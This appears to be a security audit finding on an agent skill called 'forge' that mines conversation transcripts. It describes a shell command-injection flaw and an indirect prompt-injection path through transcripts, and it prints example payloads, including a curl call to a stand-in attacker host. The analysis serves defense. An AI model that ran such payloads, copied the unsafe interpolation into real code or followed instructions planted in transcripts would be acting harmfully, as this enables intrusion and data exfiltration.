The Agent Skills Directory

[COMMAND_EXECUTION]: A command injection vulnerability exists in the shell logic within SKILL.md (Manual Execution Step 4). The script extracts a value from a file using awk and interpolates it into an echo command: $(echo "$CONF_NUM >= 0.7" | bc -l). Because the shell expands variables before execution, a specially crafted string containing shell metacharacters (e.g., "; id; #) in the CONF_NUM variable will result in arbitrary command execution.
[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection. It is designed to "mine transcripts" (untrusted user-controlled data) for knowledge. An attacker can embed malicious instructions or formatted strings (e.g., Confidence: 0.9"; curl http://attacker.com/$(whoami); ") in a conversation. The agent, following its instructions to extract confidence scores, will write this malicious payload into a .agents/forge/ file, which is then processed by the vulnerable shell script.
[DATA_EXFILTRATION]: While the skill does not contain explicit exfiltration code, the command injection vulnerability in the indexing/promotion step provides a direct primitive for an attacker to read sensitive local files and exfiltrate them via common tools like curl or wget.
[INDIRECT_PROMPT_INJECTION]: Mandatory Evidence Chain:
Ingestion points: Untrusted conversation transcripts are read in SKILL.md (Step 1 and 2).
Boundary markers: Absent. No delimiters or warnings are used to prevent the agent from treating malicious text within the transcript as valid data to be extracted.
Capability inventory: The skill performs shell command execution (bc, echo, cat, sed, date, mkdir) and file writes (.agents/learnings/, .agents/ao/search-index.jsonl) in SKILL.md (Step 4 and 5).
Sanitization: None. The extracted CONF_NUM value is used directly in a shell interpolation without escaping or validation.

forge